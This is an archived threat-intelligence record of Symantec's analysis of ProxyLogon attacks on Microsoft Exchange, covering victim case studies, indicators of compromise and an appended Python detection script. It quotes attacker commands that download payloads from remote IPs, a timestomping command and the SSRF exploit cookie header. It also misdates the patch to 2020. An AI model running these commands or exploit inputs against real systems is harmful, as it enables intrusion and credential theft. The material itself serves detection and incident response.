{
	"id": "6885f6f4-b2cb-4a66-b364-ca7d3182fb2c",
	"created_at": "2026-04-06T01:32:20.714728Z",
	"updated_at": "2026-04-10T03:35:48.600307Z",
	"deleted_at": null,
	"sha1_hash": "7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1",
	"title": "How Symantec Stops Microsoft Exchange Server Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 89810,
	"plain_text": "How Symantec Stops Microsoft Exchange Server Attacks\r\nBy About the Author\r\nArchived: 2026-04-06 01:19:42 UTC\r\nBlog updated March 11: Case studies detailing post-compromise activity seen by Symantec added, along with\r\nadditional IoCs\r\nBlog updated March 9: IoCs, additional signatures, and pre-exploitation process diagram added. \r\nUsers of Microsoft Exchange Server are advised to update to the latest version immediately, as a growing number\r\nof attackers are attempting to exploit four recently patched zero-day vulnerabilities in the software.\r\nMicrosoft released emergency patches last week (March 2) for the four vulnerabilities, which were being\r\nexploited by attackers in the wild. At the time, Microsoft said these vulnerabilities were being exploited by an\r\nadvanced persistent threat (APT) group it dubbed Hafnium (Symantec tracks this group as Ant) in targeted attacks.\r\nHowever, since then it has been reported that multiple threat actors have been rushing to exploit these\r\nvulnerabilities in Exchange Server.\r\nTwo of the vulnerabilities (CVE-2021-26855 and CVE-2021-27065) and the technique used to chain them\r\ntogether for exploitation have been given the name “ProxyLogon” by security company DevCore. Successful\r\nexploitation of ProxyLogon allows attackers to gain a foothold on a targeted network, potentially leading to\r\nfurther compromise and data exfiltration.\r\nSymantec customers are protected from attacks exploiting these vulnerabilities.\r\nQ. When did we first find out about these attacks?\r\nMicrosoft released an out-of-band patch to address the vulnerabilities in Exchange Server on March 2, 2020. The\r\nversions impacted are Exchange Server 2013, 2016, and 2019. Security firm Volexity, which Microsoft credited in\r\nits security alert detailing the vulnerabilities, said it first saw attackers exploiting the bugs on January 6, 2021.\r\nQ. 
Why are these vulnerabilities so dangerous?\r\nSuccessful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, giving them persistent system access, access to files and mailboxes on the server, and access to credentials stored on the system. Successful exploitation may also allow attackers to compromise trust and identity in a vulnerable network. This gives attackers extensive access to infected networks, allowing them to steal potentially highly sensitive information from victim organizations.\r\nQ. What are the vulnerabilities being exploited?\r\nThe four zero-day vulnerabilities that Microsoft released emergency patches for are:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 1 of 7\n\nCVE-2021-26855: Allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability is a server-side request forgery (SSRF) that is used to reach the Exchange Control Panel (ECP). It also allows the attacker to gain access to mailboxes and read sensitive information. It forms the “ProxyLogon” exploit when chained with CVE-2021-27065.\r\nCVE-2021-27065: Allows for remote code execution. It is a post-authentication arbitrary file write vulnerability in Exchange. An attacker authenticated by using CVE-2021-26855 (as in the ProxyLogon attacks) or via stolen credentials could write a file to any path on the server.\r\nCVE-2021-26858: Is an arbitrary file write vulnerability similar to CVE-2021-27065, and can be exploited in a similar manner.\r\nCVE-2021-26857: Is an insecure deserialization vulnerability in the Unified Messaging service. 
An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.\r\nThe following diagram shows an attack chain that an attacker could employ to gain initial access to data.\r\nQ. Who is Hafnium/Ant?\r\nHafnium, which Symantec tracks as Ant, was the group first seen exploiting the vulnerabilities in Exchange Server, according to Microsoft. It said at the time that Ant was exploiting the zero days to carry out “limited and targeted attacks.” Microsoft said Ant used the vulnerabilities “to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” Microsoft stated with “high confidence” that the group was state-sponsored and operating out of China. It also said the group principally attacked targets in the U.S., including infectious disease researchers, law firms, educational institutes, defense contractors, policy think tanks, and NGOs.\r\nSecurity firm Volexity also said the group was seen deploying web shells on infected systems to allow for remote access. Among the web shells Volexity said it saw deployed were China Chopper variants and ASPXSPY. Volexity also reported seeing the group carry out post-compromise activity such as credential dumping, lateral movement via PsExec, and archiving (likely in preparation for exfiltration of data). Microsoft also reported that Ant deployed post-compromise tools such as Covenant, PowerCat, and Nishang. It is likely the group was using publicly available web shells and post-compromise tools in order to make attribution of the activity more difficult.\r\nQ. 
Is Ant still the only group exploiting these vulnerabilities?\r\nNo. Since Microsoft released the emergency patches for these vulnerabilities on March 2, attacks attempting to exploit them have escalated, with “multiple malicious actors beyond Hafnium” attempting to target unpatched systems, according to Microsoft.\r\nQ. Is this a targeted attack?\r\nThe initial attacks carried out by Ant appear to have been targeted, but the large number of threat actors now attempting to exploit these vulnerabilities means these attacks are now more indiscriminate in nature.\r\nQ. What steps can I take to protect my network?\r\nWhile Symantec customers are protected from attacks attempting to exploit these vulnerabilities, all users of Exchange Server are advised to update to the most recent version immediately. Microsoft has also released a detection tool that allows you to scan your Exchange Server logs to determine if your server was compromised. The Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. has advised that all users of Exchange Server scan their systems using Microsoft’s tool, and has issued an Emergency Directive instructing all federal agencies to immediately update their Exchange servers.\r\nCase Studies – Post-compromise activity\r\nSymantec researchers have observed post-compromise activity on a small number of customer machines, where the attackers’ initial point of entry appears to have been through exploiting the vulnerabilities in Microsoft Exchange. In two cases, Symantec researchers observed activity prior to the release of Microsoft’s patches on March 2.\r\nVictim 1\r\nIn one victim, a telecoms company in the Middle East, we saw activity as far back as January 2021. China Chopper web shells were present on this victim’s network on January 13. 
China Chopper web shells were used by Ant (aka Hafnium) in the initial attacks leveraging these vulnerabilities, according to reports by Volexity. On January 29, a suspicious PowerShell command was executed to download files from a domain masquerading as a popular cloud hosting provider.\r\nA few days later, on February 1, a suspicious command was executed to create a scheduled task, which executed “debug.bat” several hours later. The task was named “test”, which may indicate that the attackers were using this as a way to test scheduled tasks. Some hours later, the attackers ran “net start vdir”, which was used to launch a service that had likely been installed by the attackers.\r\nOn February 6, a suspicious file (sok.wia) was downloaded by the attackers and was used to establish a connection with a remote host:\r\nsok.wia 94.177.123.16 443 CSIDL_PROFILE\r\nIt is likely this connection was used by the attackers to assist in exfiltration because, shortly afterwards, the credential-dumping tool Mimikatz was used to dump credentials from the system. The next day, the attackers again used sok.wia, before creating a scheduled task on a remote server (likely using stolen credentials) to execute a “server.bat” file.\r\nThe next activity was seen on February 18 when Mimikatz was executed once again, and then on February 19 ProcDump was used to dump lsass to “he.dmp”, which can be used to harvest credentials. Then later, on March 3, a suspicious file was observed at %Temp%\\in.exe, followed by a suspicious file ({71736495-d485-477d-b836-17f0085e0780}.exe) being extracted via the WinRAR archive tool, which dropped a malicious file at %system%\\inetsrv\\XmlLite.dll. This was the last activity seen on this machine.\r\nVictim 2\r\nAnother victim, this one operating in the legal sector in Southeast Asia, saw activity on its network beginning on February 28. 
This was before Microsoft issued patches for the exploited vulnerabilities, but it has been reported by Volexity that it saw activity ramping up since February 28, so it is possible information about these vulnerabilities had been leaked in the cyber crime fraternity by this time.\r\nThe first activity on this machine on February 28 was a command used to dump credentials that was executed via the w3wp.exe (IIS worker) process, consistent with execution through a web shell. On the same day ProcDump was used to dump lsass, which can be used to harvest credentials. The next day, March 1, a file called ‘uawmiver.exe’ was executed to bypass user account control (UAC). This was used to execute two batch files called “set.bat” and “set1.bat”.\r\nOn March 3, a command was used to execute another unknown batch file, which was downloaded by bitsadmin from a remote host:\r\n\"CSIDL_SYSTEM\\bitsadmin.exe\" /rawreturn /transfer getfile http://89.34.111.11/3.avi CSIDL_PROFILE\\public\\2.bat\r\nWe then saw obfuscated PowerShell commands being executed and used to download a file from a remote host:\r\n(new-object System.Net.WebClient).DownloadFile('hxxp://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\r\nThe next day, March 4, another PowerShell command was executed that searched for \"layout.aspx\" and \"iistart.aspx\". 
The last write, last access and creation times of any matches were set back to August 21, 2017:\r\npowershell.exe -command \"dir |where {$_.name -eq 'layout.aspx' -or $_.name -eq 'iistart.aspx' } | foreach-object { $_.LastWriteTime = '2017-08-21 20:26:57';$_.LastAccessTime = '2017-08-21 20:26:57'; $_.CreationTime = '2017-08-21 20:26:52' }\"\r\nThis timestomping was likely done to help conceal the malicious files and thwart any incident response investigations.\r\n7-Zip was then used to extract the contents of a ZIP archive (current.zip) that had been uploaded to the Exchange server by the attackers, before the file “current.exe” was executed, which injected a Cobalt Strike Beacon into a newly created “svchost.exe” process for backdoor access. Several hours after this, ntdsutil was used to dump credentials once again.\r\nFollowing this, a file called \"mv.exe\", which is likely Mimikatz, was executed to dump credentials. This was followed by ProcDump being used to dump lsass to harvest additional credentials. Shortly after this, an unknown file \"ccsvchst.exe\" was executed, which passed a collected hash (pass-the-hash).\r\nFinally, the attackers launched the publicly available \"secretsdump\" tool to dump credentials stored in the registry. Then, on March 8, the attackers ran Mimikatz to try to dump credentials again. 
This was the last activity seen on this machine.\r\nOther victims\r\nWe also observed some post-compromise activity in a small number of other organizations since Microsoft issued their patches on March 2, when activity ramped up significantly as it is believed a large number of threat actors were rushing to exploit these vulnerabilities.\r\nSome of the tools we saw used in post-compromise activity in those impacted since March 2 include:\r\nPowerShell\r\nBITSAdmin\r\nCertutil\r\nCobalt Strike\r\nEarthWorm tunnel tool\r\nStowaway multi-hop proxy tool\r\nChina Chopper web shells\r\nReGeorg web shells (seen by Volexity used in previous Exchange attacks)\r\nChisel\r\nAdFind\r\nPsExec\r\nMimikatz\r\nProcDump\r\nIn one case we also saw the attackers deleting shadow copies from infected machines, which is activity we typically see when attackers are preparing to carry out a ransomware attack, though we did not observe ransomware deployed on the machine.\r\nThe extensive use of living-off-the-land and open-source tools and tactics by the attackers leveraging these vulnerabilities makes attribution of these attacks difficult and means that a wide number of different threat actors may be responsible for these attacks.\r\nWith activity exploiting these vulnerabilities seen by Symantec as recently as March 9, these attacks are ongoing, and all users of Microsoft Exchange Server are urged to scan their environment and apply patches immediately.\r\nProtection\r\nFile-based:\r\nExp.CVE-2021-26855\r\nISB.Downloader!gen313\r\nBackdoor.Trojan\r\nHacktool\r\nHacktool.Regeorg\r\nHacktool.Nishang\r\nTrojan.Chinchop\r\nTrojan.Chinchop!gen3\r\nTrojan.Chinchop!gen4\r\nNetwork-based:\r\nAttack: Microsoft Exchange Server CVE-2021-26855\r\nWeb Attack: Microsoft Exchange Server 
CVE-2021-26857\r\nAttack: AntSword Activity\r\nWeb Attack: WebShell Access Attempt\r\nWeb Attack: WhatWeb Scanner Request\r\nSystem Infected: Malicious PowerShell Script Download 4\r\nSystem Infected: Malicious PowerShell Script Download 5\r\nSystem Infected: Trojan.Backdoor Activity 404\r\nWeb Attack: WebShell Access Attempt 2\r\nWeb Attack: ASP WebShell Upload Attempt\r\nData Center Security:\r\nData Center Security (DCS) Intrusion Prevention (with default policies) provides zero-day protection against the deployment of webshells on Exchange Servers, including those used in these attacks.\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise (IoCs)\r\nThe presence of the following indicators on your network may help you determine if you've already been exploited.\r\nProxyLogon\r\nFile indicators\r\nThe following regex (matched against full Windows paths) can be used to help identify suspicious aspx files/web shells dropped under the Exchange web roots:\r\n.*(\\\\aspnet_client\\\\|\\\\owa\\\\auth\\\\|\\\\ecp\\\\auth\\\\).*\\.aspx\r\nLegitimate Exchange .aspx files also live under \\\\owa\\\\auth\\\\ and \\\\ecp\\\\auth\\\\, so treat hits as candidates to review (compare against a known-good install and look for recently created or timestomped files) rather than as confirmed web shells.\r\nNetwork indicators\r\nAn HTTP GET request for /owa/auth/x.js with the following cookie header set may indicate a possible exploit attempt:\r\nX-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3\r\nLog file indicators\r\nCheck for the following CMD output in Exchange’s ECP Server logs:\r\nS:CMD=Set-OabVirtualDirectory.ExternalUrl=\r\nCheck IIS web server logs for the following URI path:\r\n/ecp/DDI/DDIService.svc/SetObject\r\nMicrosoft Scanning Tool\r\nThis tool allows you to scan your Exchange Server logs to determine if your server was compromised.\r\nhttps://github.com/microsoft/CSS-Exchange/tree/main/Security\r\nSource: 
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection"
	],
	"report_names": [
		"microsoft-exchange-server-protection"
	],
	"threat_actors": [
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439140,
	"ts_updated_at": 1775792148,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.pdf",
		"text": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.txt",
		"img": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.jpg"
	}
}
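Added example, not part of the Symantec post or of the record above: the ProxyLogon file, network and log indicators from the IoC section of the plain_text, turned into runnable Python checks and run over constructed sample data. The IIS log format assumed is the standard W3C format with a #Fields header; the file paths, HTTP requests and log lines are made up for the example. The probe check generalizes the post's cookie header by treating any X-BEResource or X-AnonResource-Backend cookie on a GET to /owa/auth/x.js as a hit, not only the literal localhost values the post shows.

```python
"""Added example (not from the Symantec post): applies the post's ProxyLogon
indicators to constructed sample data so the checks can be run offline."""
import re

# Indicators quoted from the post.
WEBSHELL_PATH_RE = re.compile(
    r".*(\\aspnet_client\\|\\owa\\auth\\|\\ecp\\auth\\).*\.aspx", re.IGNORECASE)
DDI_SETOBJECT = "/ecp/DDI/DDIService.svc/SetObject"
ECP_CMD_MARKER = "S:CMD=Set-OabVirtualDirectory.ExternalUrl="
PROBE_PATH = "/owa/auth/x.js"
# Cookies that carry the SSRF backend target in the post's sample header
# (generalization: any value, not only the localhost ones shown).
BACKEND_COOKIES = {"X-BEResource", "X-AnonResource-Backend"}


def suspicious_aspx(paths):
    """File indicator: .aspx files under aspnet_client, owa\\auth or ecp\\auth."""
    return [p for p in paths if WEBSHELL_PATH_RE.match(p)]


def parse_cookie_names(cookie_header):
    """Return the set of cookie names in a Cookie header value."""
    return {part.split("=", 1)[0].strip()
            for part in cookie_header.split(";") if part.strip()}


def is_proxylogon_probe(raw_request):
    """Network indicator: GET /owa/auth/x.js carrying backend-selecting cookies."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    if len(parts) < 2:
        return False
    method, target = parts[0], parts[1]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = parse_cookie_names(headers.get("cookie", ""))
    return (method == "GET" and target.split("?", 1)[0].lower() == PROBE_PATH
            and bool(cookies & BACKEND_COOKIES))


def iis_setobject_hits(log_lines):
    """Log indicator: W3C IIS log records whose cs-uri-stem is the DDI SetObject path."""
    fields, hits = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem", "").lower() == DDI_SETOBJECT.lower():
            hits.append((rec.get("date"), rec.get("time"), rec.get("c-ip"), rec.get("cs-uri-stem")))
    return hits


def ecp_cmd_hits(log_lines):
    """Log indicator: ECP server log lines containing the Set-OabVirtualDirectory marker."""
    return [line for line in log_lines if ECP_CMD_MARKER in line]


# Constructed sample data (not real files, requests or logs from the post or any victim).
SAMPLE_PATHS = [
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFE.aspx",
    r"C:\inetpub\wwwroot\aspnet_client\notes.txt",
]
SAMPLE_REQUEST = ("GET /owa/auth/x.js HTTP/1.1\r\n"
                  "Host: mail.example.test\r\n"
                  "Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; "
                  "X-BEResource=localhost/owa/auth/logon.aspx?~3\r\n\r\n")
BENIGN_REQUEST = ("GET /owa/auth/x.js HTTP/1.1\r\n"
                  "Host: mail.example.test\r\n"
                  "Cookie: OutlookSession=abc123\r\n\r\n")
SAMPLE_IIS_LOG = [
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
    "2021-03-03 10:15:01 10.0.0.5 GET /owa/auth/x.js - 443 198.51.100.7 200",
    "2021-03-03 10:15:02 10.0.0.5 POST /ecp/DDI/DDIService.svc/SetObject schema=OABVirtualDirectory 443 198.51.100.7 200",
    "2021-03-03 10:16:40 10.0.0.5 GET /owa/ - 443 10.0.0.20 200",
]
SAMPLE_ECP_LOG = [
    "2021-03-03T10:15:02.111Z,...,S:CMD=Set-OabVirtualDirectory.ExternalUrl='http://f/#constructed-payload'",
    "2021-03-03T10:20:00.000Z,...,S:CMD=Get-Mailbox",
]

if __name__ == "__main__":
    print("webshell path candidates:", suspicious_aspx(SAMPLE_PATHS))
    print("probe request:", is_proxylogon_probe(SAMPLE_REQUEST), is_proxylogon_probe(BENIGN_REQUEST))
    print("IIS SetObject hits:", iis_setobject_hits(SAMPLE_IIS_LOG))
    print("ECP CMD hits:", ecp_cmd_hits(SAMPLE_ECP_LOG))
```

Two caveats the sample data is built to show: the post's path regex also matches Exchange's own logon.aspx and errorFE.aspx under owa\auth, so its output is a review list, not a verdict; and /ecp/DDI/DDIService.svc/SetObject is a legitimate ECP endpoint, so a hit matters most when the same client IP also appears on the /owa/auth/x.js probe or the ECP log shows the Set-OabVirtualDirectory.ExternalUrl= write within seconds of it, as in the constructed log above.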